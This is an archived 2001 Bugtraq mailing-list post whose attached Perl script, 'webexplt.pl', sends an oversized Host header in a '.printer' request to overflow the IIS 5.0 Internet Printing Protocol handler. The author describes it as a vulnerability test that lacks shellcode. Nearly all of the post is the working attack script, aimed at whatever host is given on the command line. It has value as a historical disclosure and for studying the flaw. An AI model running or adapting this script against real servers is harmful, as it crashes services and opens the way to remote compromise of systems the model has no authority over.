[20537] in bugtraq
Re: Windows 2000 IIS 5.0 Remote buffer overflow vulnerability
daemon@ATHENA.MIT.EDU (Wanderley J. Abreu Jr.)
Wed May 2 23:23:45 2001
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00D6_01C0D307.2D2364E0"
Message-ID: <00dd01c0d320$58e39d20$f9b9dec8@corvo>
Date: Wed, 2 May 2001 12:55:34 -0300
Reply-To: "Wanderley J. Abreu Jr." <storm@UNIKEY.COM.BR>
From: "Wanderley J. Abreu Jr." <storm@UNIKEY.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_00D6_01C0D307.2D2364E0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Hi Everyone,
I've coded a very simple vulnerability test, that actually causes
the memory leak but still don't have the shellcode to overwrite the EIP
register.
Cheers,
Wanderley
------=_NextPart_000_00D6_01C0D307.2D2364E0
Content-Type: application/octet-stream;
name="webexplt.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="webexplt.pl"
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with sucess against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol=20
# This code was written after eEye brought this issue in BugTraq.
use Socket;
print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
if (not $ARGV[0]) {
print qq~
Usage: webexplt.pl <host>
~;=20
exit;}
$ip=3D$ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=3Dsendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: =
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";
if (not @results) {
print "The Machine tested has the IPP Vulnerability!";
}
print @results;
sub sendexplt {
my ($pstr)=3D@_;=20
$target=3D inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); =20
$|=3D1;
print $pstr; =20
my @in=3D<S>;
select(STDOUT);
close(S);
return @in;
} else { die("Can't connect...\n"); }
}
------=_NextPart_000_00D6_01C0D307.2D2364E0--
